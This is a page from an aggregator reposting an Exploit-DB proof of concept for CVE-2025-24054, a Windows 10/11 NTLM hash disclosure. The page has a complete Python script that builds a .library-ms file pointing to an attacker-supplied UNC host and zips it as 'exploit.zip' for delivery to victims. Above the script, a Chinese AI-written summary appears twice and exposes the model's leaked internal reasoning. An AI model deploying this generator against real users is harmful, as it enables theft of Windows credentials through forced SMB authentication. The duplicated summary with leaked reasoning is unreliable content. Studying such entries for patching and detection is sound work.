[remote] windows 10/11 - NTLM Hash Disclosure Spoofing
嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”之类的开头。直接写描述就行。 首先,我需要仔细阅读用户提供的文章内容。看起来这是一篇关于Windows 10/11的漏洞利用的标题,提到了NTLM哈希泄露欺骗。日期是2025年10月6日,作者是Beatriz Fresno Naumova,软件链接是N/A,版本不适用,测试环境是Windows 10和11的x64版本,CVE编号是CVE-2025-24054。 描述部分提到这是一个概念验证(PoC),生成一个指向网络共享(UNC)的.library-ms XML文件。当在Windows上打开或导入时,库会指向指定的UNC路径。此外,还有一些注意事项,比如负责任地披露,不要在没有授权的情况下测试生产环境,并且每个邮件只附带一个exploit文件。 接下来是Python脚本部分。这个脚本的作用是生成包含.library-ms文件的ZIP包。它包含了几个函数:is_valid_target用于验证目标是否为有效的IP、主机名或UNC路径;build_library_xml用于构建XML内容;write_zip_with_lib用于将XML写入临时文件并打包成ZIP;sanitize_basename用于确保文件名安全。 主函数main()处理命令行参数,并根据用户输入生成相应的文件。需要注意的是,这个脚本会提示用户输入文件名和目标地址,并进行一些验证和清理工作。 现在我要总结这篇文章的内容。重点在于它描述了一个利用Windows库文件行为导致NTLM哈希泄露的漏洞,并提供了一个生成相关文件的Python脚本。漏洞影响了Windows 10和11系统,并且已经分配了CVE编号。 总结的时候要简洁明了,在一百个字以内。所以我会提到漏洞名称、影响范围、利用方式以及提供的工具脚本。 </think> 该文章描述了一个针对Windows 10/11系统的漏洞(CVE-2025-24054),通过生成包含特定XML配置的.library-ms文件指向网络共享路径(UNC),可能导致NTLM哈希泄露。该工具提供了一个Python脚本用于生成包含此配置文件的ZIP包,并附带相关使用说明和安全提示。 2026-2-4 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏
嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”之类的开头。直接写描述就行。 首先,我需要仔细阅读用户提供的文章内容。看起来这是一篇关于Windows 10/11的漏洞利用的标题,提到了NTLM哈希泄露欺骗。日期是2025年10月6日,作者是Beatriz Fresno Naumova,软件链接是N/A,版本不适用,测试环境是Windows 10和11的x64版本,CVE编号是CVE-2025-24054。 描述部分提到这是一个概念验证(PoC),生成一个指向网络共享(UNC)的.library-ms XML文件。当在Windows上打开或导入时,库会指向指定的UNC路径。此外,还有一些注意事项,比如负责任地披露,不要在没有授权的情况下测试生产环境,并且每个邮件只附带一个exploit文件。 接下来是Python脚本部分。这个脚本的作用是生成包含.library-ms文件的ZIP包。它包含了几个函数:is_valid_target用于验证目标是否为有效的IP、主机名或UNC路径;build_library_xml用于构建XML内容;write_zip_with_lib用于将XML写入临时文件并打包成ZIP;sanitize_basename用于确保文件名安全。 主函数main()处理命令行参数,并根据用户输入生成相应的文件。需要注意的是,这个脚本会提示用户输入文件名和目标地址,并进行一些验证和清理工作。 现在我要总结这篇文章的内容。重点在于它描述了一个利用Windows库文件行为导致NTLM哈希泄露的漏洞,并提供了一个生成相关文件的Python脚本。漏洞影响了Windows 10和11系统,并且已经分配了CVE编号。 总结的时候要简洁明了,在一百个字以内。所以我会提到漏洞名称、影响范围、利用方式以及提供的工具脚本。 </think> 该文章描述了一个针对Windows 10/11系统的漏洞(CVE-2025-24054),通过生成包含特定XML配置的.library-ms文件指向网络共享路径(UNC),可能导致NTLM哈希泄露。该工具提供了一个Python脚本用于生成包含此配置文件的ZIP包,并附带相关使用说明和安全提示。 2026-2-4 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏
# Exploit Title: windows 10/11 - NTLM Hash Disclosure Spoofing
# Date: 2025-10-06
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A
# Version: Not applicable (this is a generic Windows library file behavior)
# Tested on: Windows 10 (x64) / Windows 11 (x64) (lab environment)
# CVE: CVE-2025-24054
# Description:
# A proof-of-concept that generates a .library-ms XML file pointing to a network
# share (UNC). When opened/imported on Windows, the library points to the specified
# UNC path.
#
# Notes:
# - This PoC is provided for responsible disclosure only. Do not test against
# live/production websites or networks without explicit written permission.
# - Attach exactly one exploit file per email (this file).
# - Include the .library-ms (or ZIP containing it) as an attachment, plus this header block.
#!/usr/bin/env python3
import argparse
import ipaddress
import os
import re
import sys
import tempfile
import zipfile
import shutil
from pathlib import Path
# Very small hostname check (keeps things simple)
_HOSTNAME_RE = re.compile(
r"^(?:[A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9\-]{1,63}$"
)
# simple sanitizer: allow only a limited charset for base filenames
_FILENAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,128}$")
def is_valid_target(value: str) -> bool:
"""
Return True if value looks like an IP address, a hostname, or a UNC path.
This is intentionally permissive — it's only to catch obvious typos.
"""
if value.startswith("\\\\") or value.startswith("//"):
# Minimal UNC sanity: ensure there's at least \\host\share (two components)
parts = re.split(r"[\\/]+", value.strip("\\/"))
return len(parts) >= 2 and all(parts[:2])
try:
ipaddress.ip_address(value)
return True
except ValueError:
pass
if _HOSTNAME_RE.match(value):
return True
return False
def build_library_xml(target: str) -> str:
"""
Build the XML content for the .library-ms file.
If the user supplies a bare host/IP, the script uses a share called 'shared'
(matching the original behavior).
"""
if target.startswith("\\\\") or target.startswith("//"):
# normalize forward slashes to backslashes (if any)
url = target.replace("/", "\\")
else:
url = f"\\\\{target}\\shared"
# Return a plain, minimal XML structure (no additional payloads)
return f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>{url}</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""
def write_zip_with_lib(xml_content: str, lib_name: str, zip_path: Path) -> None:
"""
Write the XML to a temporary .library-ms file and add it into a zip.
"""
tmpdir = Path(tempfile.mkdtemp(prefix="libgen_"))
try:
tmp_lib = tmpdir / lib_name
tmp_lib.write_text(xml_content, encoding="utf-8")
with zipfile.ZipFile(zip_path, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
# place the file at the root of the zip
zf.write(tmp_lib, arcname=lib_name)
finally:
# robust cleanup
try:
shutil.rmtree(tmpdir)
except Exception:
pass
def sanitize_basename(name: str) -> str:
"""
Ensure the provided base filename is a short safe token (no path separators).
Raises ValueError on invalid names.
"""
if not name:
raise ValueError("Empty filename")
if os.path.sep in name or (os.path.altsep and os.path.altsep in name):
raise ValueError("Filename must not contain path separators")
if not _FILENAME_RE.match(name):
raise ValueError(
"Filename contains invalid characters. Allowed: letters, numbers, dot, underscore, hyphen"
)
return name
def main():
parser = argparse.ArgumentParser(
description="Generate a .library-ms inside a zip (keep it responsible)."
)
parser.add_argument(
"--file",
"-f",
default=None,
help="Base filename (without extension). If omitted, interactive prompt is used.",
)
parser.add_argument(
"--target",
"-t",
default=None,
help="Target IP, hostname or UNC (e.g. 192.168.1.162 or \\\\host\\share).",
)
parser.add_argument(
"--zip",
"-z",
default="exploit.zip",
help="Output zip filename (default: exploit.zip).",
)
parser.add_argument(
"--out",
"-o",
default=".",
help="Output directory (default: current directory).",
)
parser.add_argument(
"--dry-run",
action="store_true",
help="Print the .library-ms content and exit without creating files.",
)
parser.add_argument(
"--force",
action="store_true",
help="Overwrite output zip if it already exists (use with care).",
)
args = parser.parse_args()
# Interactive fallback if needed
if not args.file:
try:
args.file = input("Enter your file name (base, without extension): ").strip()
except EOFError:
print("No file name provided.", file=sys.stderr)
sys.exit(1)
if not args.target:
try:
args.target = input(
"Enter IP or host (e.g. 192.168.1.162 or \\\\host\\share): "
).strip()
except EOFError:
print("No target provided.", file=sys.stderr)
sys.exit(1)
# sanitize filename
try:
safe_base = sanitize_basename(args.file)
except ValueError as e:
print(f"ERROR: invalid file name: {e}", file=sys.stderr)
sys.exit(2)
if not args.target or not is_valid_target(args.target):
print(
"ERROR: target does not look like a valid IP, hostname, or UNC path.",
file=sys.stderr,
)
sys.exit(2)
lib_filename = f"{safe_base}.library-ms"
xml = build_library_xml(args.target)
# Dry-run: show the content and exit
if args.dry_run:
print("=== DRY RUN: .library-ms content ===")
print(xml)
print("=== END ===")
print(f"(Would create {lib_filename} inside {args.zip} in {args.out})")
return
out_dir = Path(args.out).resolve()
out_dir.mkdir(parents=True, exist_ok=True)
zip_path = out_dir / args.zip
if zip_path.exists() and not args.force:
print(
f"ERROR: {zip_path} already exists. Use --force to overwrite.",
file=sys.stderr,
)
sys.exit(3)
# small reminder about authorization
print("Reminder: run tests only against systems you are authorized to test.")
write_zip_with_lib(xml, lib_filename, zip_path)
print(f"Done. Created {zip_path} containing {lib_filename} -> points to {args.target}")
if __name__ == "__main__":
main()
文章来源: https://www.exploit-db.com/exploits/52478
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh